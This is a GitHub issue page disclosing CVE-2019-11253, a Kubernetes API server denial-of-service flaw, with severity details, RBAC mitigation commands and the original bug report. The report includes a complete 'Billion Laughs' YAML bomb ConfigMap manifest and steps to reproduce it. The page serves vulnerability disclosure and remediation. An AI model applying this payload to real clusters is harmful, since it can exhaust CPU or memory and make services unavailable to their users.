10BC0 CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack · Issue #83253 · kubernetes/kubernetes · GitHub
[go: up one dir, main page]

Skip to content

CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack #83253

@raesene

Description

@raesene

CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. This vulnerability has been given an initial severity of High, with a score of 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. See the mitigation section below for instructions on how to install the more restrictive v1.14+ policy.

Affected versions:

All four patch releases are now available.

Fixed in master by #83261

Mitigation:

Requests that are rejected by authorization do not trigger the vulnerability, so managing authorization rules and/or access to the Kubernetes API server mitigates which users are able to trigger this vulnerability.

To manually apply the more restrictive v1.14.x+ policy, either as a pre-upgrade mitigation, or as an additional protection for an upgraded cluster, save the attached file as rbac.yaml, and run:

kubectl auth reconcile -f rbac.yaml --remove-extra-subjects --remove-extra-permissions 

Note: this removes the ability for unauthenticated users to use kubectl auth can-i

If you are running a version prior to v1.14.0:

  • in addition to installing the restrictive policy, turn off autoupdate for this clusterrolebinding so your changes aren’t replaced on an API server restart:
    kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=false
  • after upgrading to v1.14.0 or greater, you can remove this annotation to reenable autoupdate:
    kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=true

=============

Original description follows:

Introduction

Posting this as an issue following report to the security list who suggested putting it here as it's already public in a Stackoverflow question here

What happened:

When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a "Billion Laughs" attack which is quite well known as an XML parsing issue.

Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.

apiVersion: v1
data:
  a: &a ["web","web","web","web","web","web","web","web","web"]
  b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
  c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
  d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
  e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
  f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
  g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
  h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
  i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
kind: ConfigMap
metadata:
  name: yaml-bomb
  namespace: default

What you expected to happen:

Ideally it would be good for a maximum size of entity to be defined, or perhaps some limit on recursive references in YAML parsed by kubectl.

One note is that the original poster on Stackoverflow indicated that the resource consumption was in kube-apiserver but both tests I did (1.16 client against 1.15 Kubeadm cluster and 1.16 client against 1.16 kubeadm cluster) showed the CPU usage client-side.

How to reproduce it (as minimally and precisely as possible):

Get the manifest above and apply to a cluster as normal with kubectl create -f <manifest>. Use top or another CPU monitor to observe the quantity of CPU time used.

Anything else we need to know?:

Environment:

  • Kubernetes version (use kubectl version):

test 1 (linux AMD64 client, Kubeadm cluster running in kind)

Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"15", GitVersion:"v1.15.0", GitCommit:"e8462b5b5dc2584fdcd18e6bcfe9f1e4d970a529", GitTreeState:"clean", BuildDate:"2019-06-25T23:41:27Z", GoVersion:"go1.12.5", Compiler:"gc", Platform:"linux/amd64"}

test 2 (Linux AMD64 client, Kubeadm cluster running in VMWare Workstation)

Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:27:17Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}

Metadata

Metadata

Assignees

Labels

area/apiserverarea/client-librariesarea/securitykind/bugCategorizes issue or PR as related to a bug.official-cve-feedIssues or PRs related to CVEs officially announced by Security Response Committee (SRC)priority/critical-urgentHighest priority. Must be actively worked on as someone's top priority right now.sig/api-machineryCategorizes an issue or PR as relevant to SIG API Machinery.

Type

No type

Projects

No projects

Milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions

    0